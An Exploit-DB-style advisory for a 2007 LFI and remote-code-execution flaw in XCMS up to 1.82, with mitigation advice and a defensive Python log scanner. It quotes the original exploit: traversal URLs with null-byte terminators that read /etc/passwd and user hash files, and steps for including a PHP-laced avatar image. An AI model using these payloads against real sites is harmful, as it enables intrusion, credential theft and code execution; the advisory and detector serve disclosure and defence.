Vendor: XCMS
Author: Nexen
CVSS: 5.5 (MEDIUM)
Vulnerability type: LFI (Local File Inclusion) and RCE (Remote Code Execution)
Product Name: XCMS
Affected Version From: 1
Affected Version To: 1.82
Patch Exists: NO
Related CWE: (none listed)
CPE: (none listed)
Metasploit: (none listed)
Other Scripts: (none listed)
Platforms Tested: (none listed)
Year: 2007

XCMS LFI & RCE Exploit

This exploit allows an attacker to perform local file inclusion and remote code execution on XCMS up to and including version 1.82. It works by manipulating the 'pg' (or 's') parameter of index.php with a directory-traversal path terminated by a null byte, so that the application includes arbitrary local files from the server. The advisory also notes a hash disclosure issue: the same inclusion can be pointed at a user's .dtb file under dati/membri/ to read stored user hashes. To reach RCE, the attacker first uploads an image with PHP code embedded in it through the normal avatar upload, then includes that image via the LFI so the embedded code is executed.

Mitigation:

To mitigate this vulnerability, update XCMS to a version that is not affected. Additionally, restricting access to sensitive files and directories (such as the dati/membri/ and uploads/ paths) and validating the pg and s parameters against an allow-list of known page names, rather than using their values to build file paths, will prevent this class of LFI and RCE attack.
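As a defender-side illustration that is not part of the advisory or of XCMS itself, the following Python scanner reads constructed access-log lines and flags requests whose XCMS pg or s parameters carry the indicators that appear in the raw exploit data on this page (directory traversal, a null-byte terminator, the .dtb hash file, or an include of an uploaded avatar). The log lines are constructed samples, and the index.php path and field names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not real traffic), Combined Log Format.
# The advisory writes the terminator as "\0"; on the wire it arrives as "%00".
SAMPLE_LOG = """\
10.0.0.5 - - [28/Dec/2007:10:00:01 +0000] "GET /xcms/index.php?mod=news&pg=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Dec/2007:10:00:02 +0000] "GET /xcms/index.php?pg=admin&s=../../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "curl/7.16"
10.0.0.9 - - [28/Dec/2007:10:00:03 +0000] "GET /xcms/index.php?mod=news&pg=../../dati/membri/admin.dtb%00 HTTP/1.1" 200 96 "-" "curl/7.16"
10.0.0.9 - - [28/Dec/2007:10:00:04 +0000] "GET /xcms/index.php?mod=news&pg=..%2f..%2fuploads%2favatar%2fevil.jpg%00 HTTP/1.1" 200 40 "-" "curl/7.16"
10.0.0.7 - - [28/Dec/2007:10:00:05 +0000] "GET /xcms/index.php?mod=news&pg=contact HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
WATCHED_PARAMS = ("pg", "s")  # the XCMS page-selection parameters (assumed names)


def classify_value(value: str) -> list[str]:
    """Return the LFI indicators found in one parameter value (already decoded once by parse_qs)."""
    v = unquote(value)  # one extra decode so double-encoded traversal (%252f) is caught too
    stem = v.split("\x00", 1)[0]  # the part a null-byte-terminated include would actually open
    hits = []
    if "\x00" in v:
        hits.append("null-byte")
    if "../" in v or "..\\" in v:
        hits.append("traversal")
    if stem.lower().endswith(".dtb"):
        hits.append("dtb-hash-file")
    if "uploads/avatar/" in stem.lower():
        hits.append("avatar-include")
    return hits


def scan_log(text: str) -> list[dict]:
    """Return one finding per watched parameter value that carries at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/index.php"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for raw in params.get(name, []):
                hits = classify_value(raw)
                if hits:
                    findings.append({"client": client, "param": name, "value": raw,
                                     "indicators": hits, "status": int(status)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["param"], f["indicators"], f["status"])
```

A 200 status on a flagged request is the case worth escalating, since it suggests the include succeeded rather than failed.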
Source

Exploit-DB raw data:

#  _ __   _____  _____ _ __
# | '_ \ / _ \ \/ / _ \ '_ \
# | | | |  __/>  <  __/ | | |
# |_| |_|\___/_/\_\___|_| |_|
# XCMS <= 1.82 LFI & RCE Xpl
# Nexen rocked this one ;)
# LFIs
http://127.0.0.1/xcms/index.php?pg=admin&s=../../../../../etc/passwd\0
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../../../../etc/passwd\0

# Hash disclosure
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../dati/membri/[username].dtb\0

# RCE:
Doing RCE is more difficult: you must have an image with PHP code bound into it (you can use edjpgcom to do that).
Now upload that image on your panel, and exploit RCE through the LFI:

http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg\0

# milw0rm.com [2007-12-28]